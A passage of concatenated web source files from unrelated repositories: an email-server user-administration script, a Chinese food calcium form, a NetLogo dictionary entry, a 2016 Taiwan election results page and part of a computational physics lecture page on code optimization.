r[i].users[k]; var n = $("#user-template").clone(); var n2 = $("#user-extra-template").clone(); n.attr('id', ''); n2.attr('id', ''); $('#user_table tbody').append(n); $('#user_table tbody').append(n2); n.addClass("account_" + user.status); n2.addClass("account_" + user.status); n.attr('data-email', user.email); n.find('.address').text(user.email) n.find('.mailboxsize').text(nice_size(user.mailbox_size)) n2.find('.restore_info tt').text(user.mailbox); if (user.status == 'inactive') continue; var add_privs = ["admin"]; for (var j = 0; j < user.privileges.length; j++) { var p = $("<span><b><span class='name'></span></b> (<a href='#' onclick='mod_priv(this, \"remove\"); return false;' title='Remove Privilege'>remove privilege</a>) |</span>"); p.find('span.name').text(user.privileges[j]); n.find('.privs').append(p); if (add_privs.indexOf(user.privileges[j]) >= 0) add_privs.splice(add_privs.indexOf(user.privileges[j]), 1); } for (var j = 0; j < add_privs.length; j++) { var p = $("<span><a href='#' onclick='mod_priv(this, \"add\"); return false;' title='Add Privilege'>make <span class='name'></span></a> | </span>"); p.find('span.name').text(add_privs[j]); n.find('.add-privs').append(p); } } } }) } function do_add_user() { var email = $("#adduserEmail").val(); var pw = $("#adduserPassword").val(); var privs = $("#adduserPrivs").val(); api( "/mail/users/add", "POST", { email: email, password: pw, privileges: privs }, function(r) { // Responses are multiple lines of pre-formatted text. show_modal_error("Add User", $("<pre/>").text(r)); show_users() }, function(r) { show_modal_error("Add User", r); }); return false; } function users_set_password(elem) { var email = $(elem).parents('tr').attr('data-email'); show_modal_confirm( "Archive User", $("<p>Set a new password for <b>" + email + "</b>?</p> <p><label for='users_set_password_pw' style='display: block; font-weight: normal'>New Password:</label><input type='password' id='users_set_password_pw'></p><p><small>Passwords must be at least four characters and may not contain spaces.</small></p>"), "Set Password", function() { api( "/mail/users/password", "POST", { email: email, password: $('#users_set_password_pw').val() }, function(r) { // Responses are multiple lines of pre-formatted text. show_modal_error("Set Password", $("<pre/>").text(r)); }, function(r) { show_modal_error("Set Password", r); }); }); } function users_remove(elem) { var email = $(elem).parents('tr').attr('data-email'); show_modal_confirm( "Archive User", $("<p>Are you sure you want to archive <b>" + email + "</b>?</p> <p>The user's mailboxes will not be deleted (you can do that later), but the user will no longer be able to log into any services on this machine.</p>"), "Archive", function() { api( "/mail/users/remove", "POST", { email: email }, function(r) { // Responses are multiple lines of pre-formatted text. show_modal_error("Remove User", $("<pre/>").text(r)); show_users(); }, function(r) { show_modal_error("Remove User", r); }); }); } function mod_priv(elem, add_remove) { var email = $(elem).parents('tr').attr('data-email'); var priv = $(elem).parents('td').find('.name').text(); // can't remove your own admin access if (priv == "admin" && add_remove == "remove" && api_credentials != null && email == api_credentials[0]) { show_modal_error("Modify Privileges", "You cannot remove the admin privilege from yourself."); return; } var add_remove1 = add_remove.charAt(0).toUpperCase() + add_remove.substring(1); show_modal_confirm( "Modify Privileges", "Are you sure you want to " + add_remove + " the " + priv + " privilege for <b>" + email + "</b>?", add_remove1, function() { api( "/mail/users/privileges/" + add_remove, "POST", { email: email, privilege: priv }, function(r) { show_users(); }); }); } </script>
code/食品的分析算法/钙/index.html
quanbinn/Basic-Health-Knowledge-We-Need-To-Learn
<!DOCTYPE html> <html> <head> <title>Calcium</title> <link rel="stylesheet" type="text/css" href="rendering.css"> </head> <body> <h3>对食品的钙含量分析</h3> <ol> <li>请输入这种食品的每100克(毫升)和/或每份食品中钙含量</li> <li>单击“获取对这种食品的钙含量分析”</li> <li>在对话框里弹出对这种食品的钙含量分析及对你的饮食建议</li> </ol> <form> 能量:<input type="number" id="calory" name="calory" min="0" max="2000" step="1" placeholder="卡路里"><br> 钙:<input type="number" id="calcium" name="calcium" min="0" max="200" step="1" placeholder="输入含量(毫克)"><br> <input type="submit" value="获取对这种食品的钙含量分析" onclick="handleSubmit()"/> </form> <div id="foodCalory"></div> <div id="foodCalcium"></div> <div id="foodCaloryPercentDV"></div> <div id="foodCalciumPercentDV"></div> <div id="foodCalciumPercentDVQuotient"></div> <script src="handleSubmit().js"></script> </body> </html>
dict/ticks.html
jingsam/netlogo-manual-zh
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <head> <title>NetLogo Help: ticks </title> <link rel="stylesheet" href="../netlogo.css" type="text/css"> <meta http-equiv="Content-Type" content="text/html; charset=us-ascii"> <style type="text/css"> p { margin-left: 1.5em ; } h3 { font-size: 115% ; } h4 { font-size: 100% ; margin-left: 1.5em ; background: white ; } </style> </head> <body> <h3> <a name="ticks" id="ticks">ticks</a> </h3> <h4> ticks </h4> <p> Reports the current value of the tick counter. The result is always a number and never negative. <p> If the tick counter has not been started yet with <tt>reset-ticks</tt>, an error results. <p> Most models use the <tt>tick</tt> command to advance the tick counter, in which case <tt>ticks</tt> will always report an integer. If the <tt>tick-advance</tt> command is used, then <tt>ticks</tt> may report a floating point number. <p> See also <a href="../dictionary.html#tick">tick</a>, <a href="../dictionary.html#tick-advance">tick-advance</a>, <a href="../dictionary.html#reset-ticks">reset-ticks</a>, <a href="../dictionary.html#clear-ticks">clear-ticks</a>. <p>Take me to the full <a href="../index2.html">NetLogo Dictionary</a> </body> </html>
data/nativemoun/n000000000000000/20160116122354/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeT.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_2.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le main-le-current" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>山地原住民立法委員選舉&nbsp;候選人得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選人數" title="候選人數">&nbsp;<img src="../images/nav.gif" alt="候選人數" title="候選人數">&nbsp;候選人數:10&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選人數" title="應選人數">&nbsp;<img src="../images/nav.gif" alt="應選人數" title="應選人數">&nbsp;應選人數:3&nbsp; <!-- <img src="../images/nav.gif" alt="應有婦女當選名額" title="應有婦女當選名額">&nbsp;<img src="../images/nav.gif" alt="應有婦女當選名額" title="應有婦女當選名額">&nbsp;山地原住民合計應有婦女當選名額:0--></td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td>姓名</td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>推薦之政黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>林世偉</td> <td>男</td> <td class="tdAlignRight">2,185</td> <td class="tdAlignRight">1.9944</td> <td>無</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>尤命‧蘇樣</td> <td>男</td> <td class="tdAlignRight">540</td> <td class="tdAlignRight">0.4929</td> <td>中國生產黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>曾華德</td> <td>男</td> <td class="tdAlignRight">5,261</td> <td class="tdAlignRight">4.8021</td> <td>無</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>4</td> <td>瓦歷斯‧貝林<br>Walis‧Perin</td> <td>男</td> <td class="tdAlignRight">16,009</td> <td class="tdAlignRight">14.6126</td> <td>民主進步黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>5</td> <td>伊藍.明基努安</td> <td>男</td> <td class="tdAlignRight">7,565</td> <td class="tdAlignRight">6.9051</td> <td>信心希望聯盟</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>6</td> <td>孔文吉</td> <td>男</td> <td class="tdAlignRight">19,469</td> <td class="tdAlignRight">17.7708</td> <td>中國國民黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>7</td> <td>簡東明<br>Uliw.Qaljupayare</td> <td>男</td> <td class="tdAlignRight">25,513</td> <td class="tdAlignRight">23.2876</td> <td>中國國民黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>8</td> <td>全承威</td> <td>男</td> <td class="tdAlignRight">457</td> <td class="tdAlignRight">0.4171</td> <td>台灣獨立黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>9</td> <td>林信義</td> <td>男</td> <td class="tdAlignRight">5,899</td> <td class="tdAlignRight">5.3845</td> <td>信心希望聯盟</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>10</td> <td>高金素梅</td> <td>女</td> <td class="tdAlignRight">26,658</td> <td class="tdAlignRight">24.3328</td> <td>無黨團結聯盟</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;14807/15582&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>當選註記</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 20:21:10 +0800" title="Sat, 16 Jan 2016 20:21:10 +0800">&nbsp;資料更新時間:01/16&nbsp;20:21:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter">[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
doc/pub/codeoptimization/html/._codeoptimization-bs023.html
CompPhysics/ComputationalPhysicsMSU
<!-- Automatically generated HTML file from DocOnce source (https://github.com/hplgit/doconce/) --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="DocOnce: https://github.com/hplgit/doconce/" /> <meta name="description" content="Computational Physics Lectures: How to optimize codes, from vectorization to parallelization"> <title>Computational Physics Lectures: How to optimize codes, from vectorization to parallelization</title> <!-- Bootstrap style: bootstrap --> <link href="https://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css" rel="stylesheet"> <!-- not necessary <link href="https://netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css" rel="stylesheet"> --> <style type="text/css"> /* Add scrollbar to dropdown menus in bootstrap navigation bar */ .dropdown-menu { height: auto; max-height: 400px; overflow-x: hidden; } /* Adds an invisible element before each target to offset for the navigation bar */ .anchor::before { content:""; display:block; height:50px; /* fixed header height for style bootstrap */ margin:-50px 0 0; /* negative fixed header height */ } </style> </head> <!-- tocinfo {'highest level': 2, 'sections': [('Content', 2, None, '___sec0'), ('Optimization and profiling', 2, None, '___sec1'), ('More on optimization', 2, None, '___sec2'), ('Optimization and profiling', 2, None, '___sec3'), ('Optimization and debugging', 2, None, '___sec4'), ('Other hints', 2, None, '___sec5'), ('Vectorization and the basic idea behind parallel computing', 2, None, '___sec6'), ('A rough classification of hardware models', 2, None, '___sec7'), ('Shared memory and distributed memory', 2, None, '___sec8'), ('Different parallel programming paradigms', 2, None, '___sec9'), ('Different parallel programming paradigms', 2, None, '___sec10'), ('What is vectorization?', 2, None, '___sec11'), ('Number of elements that can acted upon', 2, None, '___sec12'), ('Number of elements that can acted upon, examples', 2, None, '___sec13'), ('Number of elements that can acted upon, examples', 2, None, '___sec14'), ('"A simple test case with and without ' 'vectorization":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/LecturePrograms/programs/Classes/cpp/program7.cpp"', 2, None, '___sec15'), ('Compiling with and without vectorization', 2, None, '___sec16'), ('Automatic vectorization and vectorization inhibitors, criteria', 2, None, '___sec17'), ('Automatic vectorization and vectorization inhibitors, exit ' 'criteria', 2, None, '___sec18'), ('Automatic vectorization and vectorization inhibitors, ' 'straight-line code', 2, None, '___sec19'), ('Automatic vectorization and vectorization inhibitors, nested ' 'loops', 2, None, '___sec20'), ('Automatic vectorization and vectorization inhibitors, function ' 'calls', 2, None, '___sec21'), ('Automatic vectorization and vectorization inhibitors, data ' 'dependencies', 2, None, '___sec22'), ('Automatic vectorization and vectorization inhibitors, more ' 'data dependencies', 2, None, '___sec23'), ('Automatic vectorization and vectorization inhibitors, memory ' 'stride', 2, None, '___sec24'), ('Compiling with and without vectorization', 2, None, '___sec25'), ('Compiling with and without vectorization using clang', 2, None, '___sec26'), ('Memory management', 2, None, '___sec27'), ('Memory and communication', 2, None, '___sec28'), ('Measuring performance', 2, None, '___sec29'), ('Problems with measuring time', 2, None, '___sec30'), ('Problems with cold start', 2, None, '___sec31'), ('Problems with smart compilers', 2, None, '___sec32'), ('Problems with interference', 2, None, '___sec33'), ('Problems with measuring performance', 2, None, '___sec34'), ('Thomas algorithm for tridiagonal linear algebra equations', 2, None, '___sec35'), ('Thomas algorithm, forward substitution', 2, None, '___sec36'), ('Thomas algorithm, backward substitution', 2, None, '___sec37'), ('Thomas algorithm and counting of operations (floating point ' 'and memory)', 2, None, '___sec38'), ('"The specialized Thomas algorithm (Project ' '1)":"https://github.com/CompPhysics/ComputationalPhysics/blob/master/doc/Projects/2016/Project1/Examples/TridiagonalTiming.cpp"', 2, None, '___sec39'), ('"Example: Transpose of a ' 'matrix":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/LecturePrograms/programs/Classes/cpp/program8.cpp"', 2, None, '___sec40'), ('"Matrix-matrix ' 'multiplication":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/LecturePrograms/programs/Classes/cpp/program9.cpp"', 2, None, '___sec41'), ('How do we define speedup? Simplest form', 2, None, '___sec42'), ('How do we define speedup? Correct baseline', 2, None, '___sec43'), ('Parallel speedup', 2, None, '___sec44'), ('Speedup and memory', 2, None, '___sec45'), ('Upper bounds on speedup', 2, None, '___sec46'), ("Amdahl's law", 2, None, '___sec47'), ('How much is parallelizable', 2, None, '___sec48'), ("Today's situation of parallel computing", 2, None, '___sec49'), ('Overhead present in parallel computing', 2, None, '___sec50'), ('Parallelizing a sequential algorithm', 2, None, '___sec51'), ('Strategies', 2, None, '___sec52'), ('How do I run MPI on a PC/Laptop? MPI', 2, None, '___sec53'), ('Can I do it on my own PC/laptop? OpenMP installation', 2, None, '___sec54'), ('Installing MPI', 2, None, '___sec55'), ('Installing MPI and using Qt', 2, None, '___sec56'), ('Using ' '"Smaug":"http://comp-phys.net/cluster-info/using-smaug/", the ' 'CompPhys computing cluster', 2, None, '___sec57'), ('What is OpenMP', 2, None, '___sec58'), ('Getting started, things to remember', 2, None, '___sec59'), ('OpenMP syntax', 2, None, '___sec60'), ('Different OpenMP styles of parallelism', 2, None, '___sec61'), ('General code structure', 2, None, '___sec62'), ('Parallel region', 2, None, '___sec63'), ('Hello world, not again, please!', 2, None, '___sec64'), ('Hello world, yet another variant', 2, None, '___sec65'), ('Important OpenMP library routines', 2, None, '___sec66'), ('Private variables', 2, None, '___sec67'), ('Master region', 2, None, '___sec68'), ('Parallel for loop', 2, None, '___sec69'), ('Parallel computations and loops', 2, None, '___sec70'), ('Scheduling of loop computations', 2, None, '___sec71'), ('Example code for loop scheduling', 2, None, '___sec72'), ('Example code for loop scheduling, guided instead of dynamic', 2, None, '___sec73'), ('More on Parallel for loop', 2, None, '___sec74'), ('What can happen with this loop?', 2, None, '___sec75'), ('Inner product', 2, None, '___sec76'), ('Different threads do different tasks', 2, None, '___sec77'), ('Single execution', 2, None, '___sec78'), ('Coordination and synchronization', 2, None, '___sec79'), ('Data scope', 2, None, '___sec80'), ('Some remarks', 2, None, '___sec81'), ('Parallelizing nested for-loops', 2, None, '___sec82'), ('Nested parallelism', 2, None, '___sec83'), ('Parallel tasks', 2, None, '___sec84'), ('Common mistakes', 2, None, '___sec85'), ('Not all computations are simple', 2, None, '___sec86'), ('Not all computations are simple, competing threads', 2, None, '___sec87'), ('How to find the max value using OpenMP', 2, None, '___sec88'), ('Then deal with the race conditions', 2, None, '___sec89'), ('What can slow down OpenMP performance?', 2, None, '___sec90'), ('What can slow down OpenMP performance?', 2, None, '___sec91'), ('Find the max location for each thread', 2, None, '___sec92'), ('Combine the values from each thread', 2, None, '___sec93'), ('"Matrix-matrix ' 'multiplication":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/ParallelizationOpenMP/OpenMPvectornorm.cpp"', 2, None, '___sec94'), ('"Matrix-matrix ' 'multiplication":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/ParallelizationOpenMP/OpenMPmatrixmatrixmult.cpp"', 2, None, '___sec95'), ('What is Message Passing Interface (MPI)?', 2, None, '___sec96'), ('Going Parallel with MPI', 2, None, '___sec97'), ('MPI is a library', 2, None, '___sec98'), ('Bindings to MPI routines', 2, None, '___sec99'), ('Communicator', 2, None, '___sec100'), ('Some of the most important MPI functions', 2, None, '___sec101'), ('"The first MPI C/C++ ' 'program":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program2.cpp"', 2, None, '___sec102'), ('The Fortran program', 2, None, '___sec103'), ('Note 1', 2, None, '___sec104'), ('"Ordered output with ' 'MPIBarrier":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program3.cpp"', 2, None, '___sec105'), ('Note 2', 2, None, '___sec106'), ('"Ordered ' 'output":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program4.cpp"', 2, None, '___sec107'), ('Note 3', 2, None, '___sec108'), ('Note 4', 2, None, '___sec109'), ('"Numerical integration in ' 'parallel":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program6.cpp"', 2, None, '___sec110'), ('Dissection of trapezoidal rule with $MPI\\_reduce$', 2, None, '___sec111'), ('Dissection of trapezoidal rule', 2, None, '___sec112'), ('Integrating with _MPI_', 2, None, '___sec113'), ('How do I use $MPI\\_reduce$?', 2, None, '___sec114'), ('More on $MPI\\_Reduce$', 2, None, '___sec115'), ('Dissection of trapezoidal rule', 2, None, '___sec116'), ('Dissection of trapezoidal rule', 2, None, '___sec117')]} end of tocinfo --> <body> <script type="text/x-mathjax-config"> MathJax.Hub.Config({ TeX: { equationNumbers: { autoNumber: "none" }, extensions: ["AMSmath.js", "AMSsymbols.js", "autobold.js", "color.js"] } }); </script> <script type="text/javascript" async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"> </script> <!-- Bootstrap navigation bar --> <div class="navbar navbar-default navbar-fixed-top"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-responsive-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="codeoptimization-bs.html">Computational Physics Lectures: How to optimize codes, from vectorization to parallelization</a> </div> <div class="navbar-collapse collapse navbar-responsive-collapse"> <ul class="nav navbar-nav navbar-right"> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown">Contents <b class="caret"></b></a> <ul class="dropdown-menu"> <!-- navigation toc: --> <li><a href="._codeoptimization-bs001.html#___sec0" style="font-size: 80%;">Content</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs002.html#___sec1" style="font-size: 80%;">Optimization and profiling</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs003.html#___sec2" style="font-size: 80%;">More on optimization</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs004.html#___sec3" style="font-size: 80%;">Optimization and profiling</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs005.html#___sec4" style="font-size: 80%;">Optimization and debugging</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs006.html#___sec5" style="font-size: 80%;">Other hints</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs007.html#___sec6" style="font-size: 80%;">Vectorization and the basic idea behind parallel computing</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs008.html#___sec7" style="font-size: 80%;">A rough classification of hardware models</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs009.html#___sec8" style="font-size: 80%;">Shared memory and distributed memory</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs010.html#___sec9" style="font-size: 80%;">Different parallel programming paradigms</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs011.html#___sec10" style="font-size: 80%;">Different parallel programming paradigms</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs012.html#___sec11" style="font-size: 80%;">What is vectorization?</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs013.html#___sec12" style="font-size: 80%;">Number of elements that can acted upon</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs014.html#___sec13" style="font-size: 80%;">Number of elements that can acted upon, examples</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs015.html#___sec14" style="font-size: 80%;">Number of elements that can acted upon, examples</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs016.html#___sec15" style="font-size: 80%;">"A simple test case with and without vectorization":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/LecturePrograms/programs/Classes/cpp/program7.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs017.html#___sec16" style="font-size: 80%;">Compiling with and without vectorization</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs018.html#___sec17" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, criteria</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs019.html#___sec18" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, exit criteria</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs020.html#___sec19" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, straight-line code</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs021.html#___sec20" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, nested loops</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs022.html#___sec21" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, function calls</a></li> <!-- navigation toc: --> <li><a href="#___sec22" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, data dependencies</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs024.html#___sec23" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, more data dependencies</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs025.html#___sec24" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, memory stride</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs026.html#___sec25" style="font-size: 80%;">Compiling with and without vectorization</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs027.html#___sec26" style="font-size: 80%;">Compiling with and without vectorization using clang</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs028.html#___sec27" style="font-size: 80%;">Memory management</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs029.html#___sec28" style="font-size: 80%;">Memory and communication</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs030.html#___sec29" style="font-size: 80%;">Measuring performance</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs031.html#___sec30" style="font-size: 80%;">Problems with measuring time</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs032.html#___sec31" style="font-size: 80%;">Problems with cold start</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs033.html#___sec32" style="font-size: 80%;">Problems with smart compilers</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs034.html#___sec33" style="font-size: 80%;">Problems with interference</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs035.html#___sec34" style="font-size: 80%;">Problems with measuring performance</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs036.html#___sec35" style="font-size: 80%;">Thomas algorithm for tridiagonal linear algebra equations</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs037.html#___sec36" style="font-size: 80%;">Thomas algorithm, forward substitution</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs038.html#___sec37" style="font-size: 80%;">Thomas algorithm, backward substitution</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs039.html#___sec38" style="font-size: 80%;">Thomas algorithm and counting of operations (floating point and memory)</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs040.html#___sec39" style="font-size: 80%;">"The specialized Thomas algorithm (Project 1)":"https://github.com/CompPhysics/ComputationalPhysics/blob/master/doc/Projects/2016/Project1/Examples/TridiagonalTiming.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs041.html#___sec40" style="font-size: 80%;">"Example: Transpose of a matrix":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/LecturePrograms/programs/Classes/cpp/program8.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs042.html#___sec41" style="font-size: 80%;">"Matrix-matrix multiplication":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/LecturePrograms/programs/Classes/cpp/program9.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs043.html#___sec42" style="font-size: 80%;">How do we define speedup? Simplest form</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs044.html#___sec43" style="font-size: 80%;">How do we define speedup? Correct baseline</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs045.html#___sec44" style="font-size: 80%;">Parallel speedup</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs046.html#___sec45" style="font-size: 80%;">Speedup and memory</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs047.html#___sec46" style="font-size: 80%;">Upper bounds on speedup</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs048.html#___sec47" style="font-size: 80%;">Amdahl's law</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs049.html#___sec48" style="font-size: 80%;">How much is parallelizable</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs050.html#___sec49" style="font-size: 80%;">Today's situation of parallel computing</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs051.html#___sec50" style="font-size: 80%;">Overhead present in parallel computing</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs052.html#___sec51" style="font-size: 80%;">Parallelizing a sequential algorithm</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs053.html#___sec52" style="font-size: 80%;">Strategies</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs054.html#___sec53" style="font-size: 80%;">How do I run MPI on a PC/Laptop? MPI</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs055.html#___sec54" style="font-size: 80%;">Can I do it on my own PC/laptop? OpenMP installation</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs056.html#___sec55" style="font-size: 80%;">Installing MPI</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs057.html#___sec56" style="font-size: 80%;">Installing MPI and using Qt</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs058.html#___sec57" style="font-size: 80%;">Using "Smaug":"http://comp-phys.net/cluster-info/using-smaug/", the CompPhys computing cluster</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs059.html#___sec58" style="font-size: 80%;">What is OpenMP</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs060.html#___sec59" style="font-size: 80%;">Getting started, things to remember</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs061.html#___sec60" style="font-size: 80%;">OpenMP syntax</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs062.html#___sec61" 